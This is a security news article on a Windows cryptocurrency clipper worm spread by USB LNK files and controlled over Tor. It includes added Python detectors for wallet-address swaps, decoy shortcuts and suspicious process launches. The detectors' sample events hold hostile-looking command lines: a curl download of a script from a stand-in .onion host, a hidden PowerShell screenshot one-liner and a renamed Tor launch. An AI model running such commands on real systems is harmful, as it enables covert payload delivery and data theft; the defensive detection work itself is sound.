Microsoft has disclosed details of a Windows-based cryptocurrency clipper campaign that has been targeting users since February 2026. The campaign employs clipboard-intercepting malware with self-spreading (worm) capabilities and routes its command-and-control traffic over the Tor anonymity network to obscure where it is reporting.
Technical Insights into the Clipper Malware
The Microsoft Defender Security Research Team elaborated on the mechanics of this clipper in a recent analysis. According to their findings, “The clipper in this campaign relies on Windows Script Host and ActiveX-driven logic to launch a bundled Tor proxy and poll a hidden-service C2 [command-and-control] server.” This malware is designed for high-frequency clipboard theft, screenshot exfiltration, and wallet-address substitution.
What sets this clipper apart is its departure from conventional installation methods. It does not rely on traditional installers or exposed IP-based C2 infrastructure. Instead, it deploys a portable Tor client, routes traffic through a local SOCKS5 proxy, and merges data theft with remote code execution, effectively transforming a financially motivated stealer into a lightweight backdoor.
Mechanism of Attack
Clipper malware is particularly insidious because it silently watches the user's clipboard, reading whatever is copied into that short-term buffer. Its primary focus is cryptocurrency transactions: when the copied text matches the format of a known blockchain address, the clipper replaces it with an attacker-controlled address of the same type, so a victim who pastes the value into a transfer sends funds to the attacker instead of the intended recipient.
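As an added illustration (not code from Microsoft's analysis), the following Python shows the kind of format matching a clipper uses to decide that a clipboard value is a wallet address, and turns it around into a defensive check: compare what a user copied with what the clipboard holds a moment later and flag a same-family swap. The address patterns are format-only regular expressions with no checksum validation, and the sample addresses are constructed; both are assumptions of this example.

```python
import re

# Format-only patterns for common address families. They do not verify checksums
# (an assumption of this example); a clipper only needs a cheap "looks like an
# address" test, and so does the defensive comparison below.
ADDRESS_PATTERNS = {
    "btc-legacy": re.compile(r"[13][a-km-zA-HJ-NP-Z1-9]{25,34}"),  # base58 P2PKH / P2SH
    "btc-bech32": re.compile(r"bc1[a-z0-9]{39,59}"),                # segwit / taproot
    "eth":        re.compile(r"0x[0-9a-fA-F]{40}"),                 # EVM chains
    "tron":       re.compile(r"T[a-km-zA-HJ-NP-Z1-9]{33}"),         # base58 TRON
}


def classify_address(text):
    """Return the address family the whole (stripped) clipboard value matches, or None."""
    candidate = text.strip()
    for family, pattern in ADDRESS_PATTERNS.items():
        if pattern.fullmatch(candidate):
            return family
    return None


def detect_substitution(copied, clipboard_now):
    """Compare the value a user copied with what the clipboard holds now.

    A clipper swaps an address for one of the same family so the paste still
    looks valid; that is exactly the case flagged here. Returns a dict describing
    the swap, or None when nothing address-like changed.
    """
    before = classify_address(copied)
    after = classify_address(clipboard_now)
    if before is None or before != after:
        return None
    if copied.strip() == clipboard_now.strip():
        return None
    return {"family": before, "expected": copied.strip(), "found": clipboard_now.strip()}


# Constructed sample values (not real victim data).
COPIED_ETH = "0x" + "ab" * 20
SWAPPED_ETH = "0x" + "cd" * 20
COPIED_BTC = "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2"

if __name__ == "__main__":
    print(classify_address(COPIED_BTC))                  # btc-legacy
    print(detect_substitution(COPIED_ETH, SWAPPED_ETH))  # swap flagged as family "eth"
    print(detect_substitution(COPIED_ETH, COPIED_ETH))   # None
```

On a real Windows host the two values would come from a clipboard listener (reading the clipboard at copy time and again just before paste); that plumbing is not shown here. The comparison deliberately ignores changes between unrelated text and an address, since that is normal user activity rather than a swap.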
The attack vector involves distributing a malicious Windows Shortcut (LNK) file via USB storage devices. When opened, this file triggers a worm component that checks if the machine is already infected. If it is not, the worm proceeds to fetch the payload from a remote server. A second module, the clipper, is then deployed to harvest and exfiltrate cryptocurrency wallet information.
The LNK payload scans the USB device for common document types such as DOC, XLSX, and PDF. If any are found, it hides them and creates new LNK files that share the same names but carry arguments leading to the worm component. Because Windows Explorer never displays the .lnk extension, each decoy appears under the original document's name, so an unsuspecting user who tries to open what looks like a harmless document instead launches the malware.
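The decoy layout described above (a hidden document plus a same-named shortcut that launches a script engine) can be checked for directly. The following Python is an added example, not Microsoft's tooling: it takes a listing of a removable drive in which the hidden attribute and each shortcut's target and arguments have already been extracted (by a LNK parser or by hand; that extraction is assumed here), and pairs every suspicious shortcut with the hidden document it impersonates. The listing is constructed sample data, and the inclusion of mshta.exe, powershell.exe and cmd.exe beyond the WScript/CScript named in the text is this example's assumption.

```python
import ntpath
from dataclasses import dataclass

# Document types the text says the worm hides and replaces with shortcuts.
DOC_EXTENSIONS = {".doc", ".docx", ".xls", ".xlsx", ".pdf"}

# Hosts a document shortcut has no business launching (extended beyond the
# WScript/CScript named in the text; assumption of this example).
SCRIPT_ENGINES = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "cmd.exe"}


@dataclass
class Entry:
    name: str             # file name as it appears on the drive
    hidden: bool = False  # FILE_ATTRIBUTE_HIDDEN set
    target: str = ""      # for .lnk files: resolved target path
    args: str = ""        # for .lnk files: command-line arguments


def launches_script_engine(entry):
    """True when a shortcut's target, or something named in its arguments, is a script host."""
    target = ntpath.basename(entry.target).lower()
    args = entry.args.lower()
    return target in SCRIPT_ENGINES or any(engine in args for engine in SCRIPT_ENGINES)


def find_decoy_shortcuts(entries):
    """Pair each .lnk that launches a script engine with a hidden document of the same name.

    Explorer never shows the .lnk extension, so 'Budget.xlsx.lnk' displays as
    'Budget.xlsx' once the real file is hidden. Returns one dict per decoy found.
    """
    hidden_docs = {}
    for e in entries:
        stem, ext = ntpath.splitext(e.name)
        if e.hidden and ext.lower() in DOC_EXTENSIONS:
            # Index by full name and by stem so both 'Budget.xlsx.lnk' and 'Budget.lnk' match.
            hidden_docs[e.name.lower()] = e.name
            hidden_docs[stem.lower()] = e.name

    findings = []
    for e in entries:
        stem, ext = ntpath.splitext(e.name)
        if ext.lower() != ".lnk":
            continue
        impersonated = hidden_docs.get(stem.lower())
        if impersonated and launches_script_engine(e):
            findings.append({"shortcut": e.name, "hides": impersonated,
                             "target": e.target, "args": e.args})
    return findings


# Constructed listing of a removable drive (sample data, not a real capture).
SAMPLE_ENTRIES = [
    Entry("Budget.xlsx", hidden=True),
    Entry("Budget.xlsx.lnk", target=r"C:\Windows\System32\wscript.exe",
          args=r"//B //E:JScript E:\_\worm.js"),
    Entry("Readme.pdf"),
    Entry("Readme.pdf.lnk", target=r"C:\Program Files\Reader\reader.exe", args="Readme.pdf"),
    Entry("notes.txt"),
]

if __name__ == "__main__":
    for f in find_decoy_shortcuts(SAMPLE_ENTRIES):
        print(f"{f['shortcut']} impersonates hidden {f['hides']} -> {f['target']} {f['args']}")
```

The second shortcut in the sample is a legitimate document link (visible file, non-script target) and is not reported, which is the false positive the name-pairing plus target check is meant to avoid.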
Persistence and Evasion Techniques
The worm component not only propagates to other uncompromised USB drives but also creates scheduled tasks to maintain persistence for both itself and the stealer component. The clipper uses WScript and ActiveXObject to interact with the operating system and exits if Task Manager is found among running processes, reducing the chance that a curious user notices it.
In the final stages of its operation, the malware launches a renamed Tor binary in a hidden window, generates a unique victim identifier, and registers it with an external server. Following this, the malware enters a continuous loop, polling the C2 server for instructions while simultaneously monitoring the clipboard every 500 milliseconds to extract seed phrases and private keys.
As noted by Microsoft, “It also hijacks cryptocurrency addresses by replacing copied wallet values with attacker-controlled alternatives and uploads screenshots through Tor.” If the C2 server returns an EVAL response, the malware executes attacker-supplied code at runtime.
Recommended Mitigations
In light of these findings, Microsoft has advised defenders to prioritize behavioral detections over static signatures. Key recommendations include:
- Monitoring for PowerShell-based screen capture and the use of WScript, CScript, or related script engines for launching curl, cmd.exe, PowerShell, or unexpected executables.
- Disabling AutoRun/AutoPlay for all removable media.
- Blocking LNK execution from removable drives via Group Policy Objects (GPOs).
- Restricting unnecessary use of wscript.exe or cscript.exe.
- Reviewing clipboard-related and screen-capture behaviors on devices that handle sensitive financial workflows.
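To make the first and last recommendations concrete, here is an added example (not Microsoft's detection content) that runs those behavioral rules over process-creation telemetry of the shape Sysmon Event ID 1 or an EDR emits: a script host spawning curl, cmd.exe or PowerShell; a script host spawning an executable outside the Windows and Program Files trees (the "unexpected executable" case, with that allowlist an assumption of this example); PowerShell invoked with screen-capture APIs on its command line; and, since the text says the Tor client is renamed, a process that is not named tor.exe yet carries Tor configuration options on its command line (an indicator assumed here; the page does not say how the binary is launched). The events are constructed samples.

```python
import ntpath

# Parent/child combinations the recommendations call out.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
LAUNCHED_TOOLS = {"curl.exe", "cmd.exe", "powershell.exe", "pwsh.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Directories from which a script host launching a binary is treated as expected
# (assumption of this example; tune to the environment).
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# .NET calls a PowerShell screenshot one-liner needs.
SCREEN_CAPTURE_MARKERS = ("copyfromscreen", "system.drawing", "primaryscreen")

# Tor configuration options; seeing them on a process not named tor.exe suggests a
# renamed Tor binary (assumed indicator, see lead-in).
TOR_OPTIONS = ("socksport", "controlport", "datadirectory", "hiddenservicedir")


def _base(path):
    return ntpath.basename(path).lower()


def evaluate_event(event):
    """Return the names of every rule a single process-creation event matches."""
    parent = _base(event.get("ParentImage", ""))
    image_path = event.get("Image", "")
    image = _base(image_path)
    cmdline = event.get("CommandLine", "").lower()
    hits = []

    if parent in SCRIPT_HOSTS:
        if image in LAUNCHED_TOOLS:
            hits.append("script-engine-launches-tool")
        elif not image_path.lower().startswith(TRUSTED_PREFIXES):
            hits.append("script-engine-launches-unexpected-exe")

    if image in POWERSHELL and any(m in cmdline for m in SCREEN_CAPTURE_MARKERS):
        hits.append("powershell-screen-capture")

    if image != "tor.exe" and any(opt in cmdline for opt in TOR_OPTIONS):
        hits.append("renamed-tor-options")

    return hits


def detect_suspicious(events):
    """Run every rule over a sequence of events; returns (event_index, rule) pairs."""
    return [(i, rule) for i, ev in enumerate(events) for rule in evaluate_event(ev)]


# Constructed Sysmon-style events (sample data, not a real capture).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -s --socks5-hostname 127.0.0.1:9050 -o C:\Users\Public\s.js http://example.onion/p"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -c Add-Type -AssemblyName System.Drawing; "
                    "$b=New-Object Drawing.Bitmap 1920,1080; "
                    "[Drawing.Graphics]::FromImage($b).CopyFromScreen(0,0,0,0,$b.Size)"},
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Users\Public\Libraries\updater.exe",
     "CommandLine": r"updater.exe --SocksPort 9050 --DataDirectory C:\Users\Public\Libraries\d"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",  # benign: scheduled script
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"wscript.exe C:\Windows\System32\slmgr.vbs /dlv"},
    {"ParentImage": r"C:\Windows\explorer.exe",  # benign: interactive admin
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c Get-Process"},
]

if __name__ == "__main__":
    for idx, rule in detect_suspicious(SAMPLE_EVENTS):
        print(f"event {idx}: {rule} <- {SAMPLE_EVENTS[idx]['CommandLine'][:60]}")
```

The two benign events (a service running a signed Windows script through wscript.exe, and an administrator running Get-Process) produce no hits: the rules key on what the script host launches and on what PowerShell is asked to do, not on the mere presence of those engines, which is what keeps this usable in an environment that cannot simply block them.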